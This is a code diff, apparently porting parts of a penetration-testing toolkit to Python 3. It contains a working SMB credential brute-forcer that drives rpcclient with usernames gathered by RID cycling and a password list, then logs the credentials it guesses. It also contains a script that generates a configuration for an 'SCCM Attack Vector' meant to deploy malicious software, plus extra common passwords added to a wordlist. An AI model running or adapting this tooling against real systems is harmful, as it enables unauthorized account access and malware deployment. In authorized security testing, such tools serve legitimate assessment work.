passfile = open(passwords, "r").readlines()
userfile = ""
# if userlist was specified
if userlist:
# use the userlist specified
userfile = file(userlist, "r").readlines()
userfile = open(userlist, "r").readlines()
# our list of users
else:
userfile = file("%s_users.txt" % ip, "r").readlines()
# write out the files upon success
filewrite = file("%s_success_results.txt" % ip, "a")
userfile = open("%s_users.txt" % ip, "r").readlines()
# cycle through username first
for user in userfile:
filewrite = open("%s_success_results.txt" % ip, "a")
user = user.rstrip()
user_fixed = user.replace("\\", "\\\\")
user_fixed = user.replace("\\", "\\\\").replace("'", "")
# if the user isn't blank
if user:
@ -283,72 +291,106 @@ try:
password = user.split("\\")[1]
password = password.lower()
# if domain isn't specified
else: password = user.lower()
except: pass
else:
password = user.lower()
except:
pass
# if we specify a uppercase username
if password == "uc username":
try:
if "\\" in password:
password = user.split("\\")[1]
password = password.upper()
else: password = user.lower()
except: pass
child = pexpect.spawn("rpcclient -U '%s%%%s' %s" % (user_fixed, password, ip))
else:
password = user.lower()
except:
pass
if password != "":
child = pexpect.spawn(
"rpcclient -U '%s%%%s' %s" % (user_fixed, password, ip))
# if we are using a blank password
if password == "":
child = pexpect.spawn(
"rpcclient -U '%s' -N %s" % (user_fixed, ip))
i = child.expect(['LOGON_FAILURE', 'rpcclient', 'NT_STATUS_ACCOUNT_EXPIRED',
'NT_STATUS_ACCOUNT_LOCKED_OUT', 'NT_STATUS_PASSWORD_MUST_CHANGE', 'NT_STATUS_ACCOUNT_DISABLED', 'NT_STATUS_LOGON_TYPE_NOT_GRANTED', 'NT_STATUS_BAD_NETWORK_NAME', 'NT_STATUS_CONNECTION_REFUSED'])
'NT_STATUS_ACCOUNT_LOCKED_OUT', 'NT_STATUS_PASSWORD_MUST_CHANGE', 'NT_STATUS_ACCOUNT_DISABLED', 'NT_STATUS_LOGON_TYPE_NOT_GRANTED', 'NT_STATUS_BAD_NETWORK_NAME', 'NT_STATUS_CONNECTION_REFUSED', 'NT_STATUS_PASSWORD_EXPIRED', 'NT_STATUS_NETWORK_UNREACHABLE'])
# login failed for this one
if i == 0:
if "\\" in password:
password = password.split("\\")[1]
print "Failed guessing username of %s and password of %s" % (user, password)
print("Failed guessing username of %s and password of %s" % (user, password))
child.kill(0)
# if successful
if i == 1:
print "[*] Successfully guessed username: %s with password of: %s" % (user, password)
filewrite.write("username: %s password: %s\n" % (user, password))
print("[*] Successfully guessed username: %s with password of: %s" % (user, password))
filewrite.write(
"username: %s password: %s\n" % (user, password))
success = True
filewrite.close()
child.kill(0)
# if account expired
if i == 2:
print "[-] Successfully guessed username: %s with password of: %s however, it is set to expired." % (user, password)
filewrite.write("username: %s password: %s\n" % (user, password))
print("[-] Successfully guessed username: %s with password of: %s however, it is set to expired." % (user, password))
filewrite.write(
"username: %s password: %s\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
# if account is locked out
if i == 3:
print "[!] Careful. Received a NT_STATUS_ACCOUNT_LOCKED_OUT was detected.. \
You may be locking accounts out!"
print("[!] Careful. Received a NT_STATUS_ACCOUNT_LOCKED_OUT was detected.. \
You may be locking accounts out!")
child.kill(0)
# if account change is needed
if i == 4:
print "[*] Successfully guessed password but needs changed. Username: %s with password of: %s" % (user,password)
filewrite.write("CHANGE PASSWORD NEEDED - username: %s password: %s\n" % (user, password))
print("[*] Successfully guessed password but needs changed. Username: %s with password of: %s" % (user, password))
filewrite.write(
"CHANGE PASSWORD NEEDED - username: %s password: %s\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
if i ==8:
print "[!] Unable to connect to the server. Try again or check networking settings."
print "[!] Exiting RIDENUM..."
# if account is disabled
if i == 5:
print("[*] Account is disabled: %s with password of: %s" % (user, password))
filewrite.write(
"ACCOUNT DISABLED: %s PW: %s\n" % (user, password))
success = True
child.kill(0)
if i == 8 or i == 9:
print("[!] Unable to connect to the server. Try again or check networking settings.")
print("[!] Exiting RIDENUM...")
success = False
sys.exit()
# if successful
if i == 9:
print("[*] Successfully guessed username: %s with password of (NOTE IT IS EXPIRED!): %s" % (user, password))
filewrite.write(
"username: %s password: %s (password expired)\n" % (user, password))
filewrite.close()
success = True
child.kill(0)
filewrite.close()
# if we got lucky
if success:
print "[*] We got some accounts, exported results to %s_success_results_txt" % ip
print "[*] All accounts extracted via RID cycling have been exported to %s_users.txt" % ip
print("[*] We got some accounts, exported results to %s_success_results_txt" % ip)
print("[*] All accounts extracted via RID cycling have been exported to %s_users.txt" % ip)
# if we weren't successful
else:
print "\n[!] Unable to brute force a user account, sorry boss."
print("\n[!] Unable to brute force a user account, sorry boss.")
# exit out after we are finished
sys.exit()
# except keyboard interrupt
except KeyboardInterrupt:
print "[*] Okay, Okay... Exiting... Thanks for using rid_enum.py"
print("[*] Okay, Okay... Exiting... Thanks for using rid_enum.py")

15
src/fasttrack/sccm/sccm_main.py
View file

@ -1,9 +1,10 @@
#!/usr/bin/python
from src.core.setcore import *
print "The" + bcolors.BOLD + " SCCM Attack Vector " + bcolors.ENDC + "will utilize the SCCM configurations to deploy malicious software. \n\nYou need to have the SMSServer name and a PackageID you want to package on the website. Then you need to copy this configuration file to the startup directory for all of the users on the server."
print("The" + bcolors.BOLD + " SCCM Attack Vector " + bcolors.ENDC + "will utilize the SCCM configurations to deploy malicious software. \n\nYou need to have the SMSServer name and a PackageID you want to package on the website. Then you need to copy this configuration file to the startup directory for all of the users on the server.")
sms_server = raw_input("Enter the IP address or hostname of the SMS Server: ")
package_id = raw_input("Enter the Package ID of the package you want to patch: ")
sms_server = input("Enter the IP address or hostname of the SMS Server: ")
package_id = input(
"Enter the Package ID of the package you want to patch: ")
configuration = '''
# configuration file written by Dave DeSimone and Bill Readshaw
@ -32,10 +33,12 @@ Next
''' % (sms_server, package_id)
# write out the file to reports
filewrite = file(setdir + "/reports/sccm_configuration.txt", "w")
filewrite = open(setdir + "/reports/sccm_configuration.txt", "w")
filewrite.write(configuration)
filewrite.close()
print_status("The SCCM configuration script has been successfully created.")
print_status("You need to copy the script to the startup folder of the server.")
print_status("Report has been exported to %s/reports/sccm_configuration.txt" % (definepath))
pause = raw_input("Press " + bcolors.RED + "{return} " + bcolors.ENDC + "to exit this menu.")
print_status(
"Report has been exported to %s/reports/sccm_configuration.txt" % (definepath))
pause = input("Press " + bcolors.RED +
"{return} " + bcolors.ENDC + "to exit this menu.")

9
src/fasttrack/wordlist.txt
View file

@ -94,7 +94,16 @@ dirt
air
earth
company
company1
company123
company1!
company!
secret
secret!
secret123
secret1212
secret12
secret1!
sqlpass123
Summer2013
Summer2012